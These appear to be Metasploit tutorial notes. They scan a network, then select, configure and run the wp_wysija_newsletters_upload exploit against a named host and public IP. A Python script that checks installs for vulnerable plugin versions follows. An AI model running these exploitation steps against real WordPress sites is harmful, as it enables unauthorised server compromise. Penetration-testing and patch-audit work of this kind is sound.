Metasploit

The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.

WordPress

Identify a Remote Host

msf > db_nmap -v -sV 192.168.111.xxx

Scan an Entire Network

  • This will save the results to the Metasploit database:
msf > nmap -v -sV 192.168.111.0/24 -oA subnet_1
  • hosts will list all the hosts found by nmap.
  • hosts -R will add them to the list of hosts to exploit.

Searching for a WordPress Vulnerability

msf > search name:wordpress

Use an Exploit

  • This will select an exploit to use:
msf > use exploit/unix/webapp/wp_wysija_newsletters_upload
  • This will list the payloads that can be used with the exploit:
msf exploit(wp_wysija_newsletters_upload) > show payloads

  • This will show what software and version will be targeted:
msf exploit(wp_wysija_newsletters_upload) > show targets
Exploit targets:

    Id  Name
    --  ----
    0   wysija-newsletters < 2.6.8

Next configure the Exploit

msf exploit(wp_wysija_newsletters_upload) > show options
Module options (exploit/unix/webapp/wp_wysija_newsletters_upload):

    Name        Current Settings    Required    Description
    ----        ----------------    --------    -----------
    Proxies                         no          A proxy chain of format type:host:port[,type:host:port][...]
    RHOST                           no          The target address
    RPORT       80                  yes         The target port
    SSL         false               no          Negotiate SSL/TLS for outgoing connections
    TARGETURI   /                   no          The base path to the wordpress application
    VHOST                           no          HTTP server virtual host

Exploit target:

    Id  Name
    --  ----
    0   wysija-newsletters < 2.6.8
  • Here is where we set all the options:
msf exploit(wp_wysija_newsletters_upload) > set RHOST 159.203.19.77
msf exploit(wp_wysija_newsletters_upload) > set RPORT 443
msf exploit(wp_wysija_newsletters_upload) > set SSL true
msf exploit(wp_wysija_newsletters_upload) > set VHOST myles.life

Run the Exploit

msf exploit(wp_wysija_newsletters_upload) > exploit
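
For the defensive side of the target line shown above (wysija-newsletters < 2.6.8), here is an added example, not part of the original notes or of Metasploit, that checks a WordPress install on disk for a plugin version below 2.6.8. The plugin directory name and the helper names are assumptions, and the sample installs are constructed.

```python
import re, sys, tempfile
from pathlib import Path

FIXED_IN = (2, 6, 8)               # from the target line: "wysija-newsletters < 2.6.8"
PLUGIN_DIR = "wysija-newsletters"  # assumption: directory is named like the target
# WordPress-style plugin header, e.g. " * Version: 2.6.7"
HEADER = re.compile(rb"^[ \t/*#@]*Version:\s*([0-9]+(?:\.[0-9]+)*)", re.M | re.I)

def plugin_version(plugin_path):
    """Return the Version header of the first top-level PHP file that has one."""
    for php in sorted(Path(plugin_path).glob("*.php")):
        with open(php, "rb") as fh:
            match = HEADER.search(fh.read(8192))  # headers live in the first 8 KB
        if match:
            return tuple(int(p) for p in match.group(1).decode().split("."))
    return None

def is_affected(version):
    """True when version < FIXED_IN; short versions are padded (2.6 -> 2.6.0)."""
    padded = tuple(version) + (0,) * (len(FIXED_IN) - len(version))
    return padded < FIXED_IN

def audit(wp_root):
    """Classify one WordPress root; returns (status, version or None)."""
    plugin = Path(wp_root) / "wp-content" / "plugins" / PLUGIN_DIR
    if not plugin.is_dir():
        return ("not-installed", None)
    version = plugin_version(plugin)
    if version is None:
        return ("unknown-version", None)  # header missing or stripped: check by hand
    return ("affected" if is_affected(version) else "patched", version)

def make_sample(root, version):
    """Write a constructed plugin file so the check can run offline."""
    plugin = Path(root) / "wp-content" / "plugins" / PLUGIN_DIR
    plugin.mkdir(parents=True)
    header = "<?php\n/*\nPlugin Name: Sample (constructed)\nVersion: %s\n*/\n" % version
    (plugin / "index.php").write_text(header)
    return root

if __name__ == "__main__":
    # With no arguments, audit two constructed installs; otherwise audit given roots.
    roots = sys.argv[1:] or [make_sample(tempfile.mkdtemp(), v) for v in ("2.6.7", "2.6.8")]
    for root in roots:
        status, version = audit(root)
        print(root, status, ".".join(map(str, version)) if version else "-")
```

Pass one or more WordPress root directories as arguments to audit real installs; an "unknown-version" result means no version header was found and the plugin should be checked by hand.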
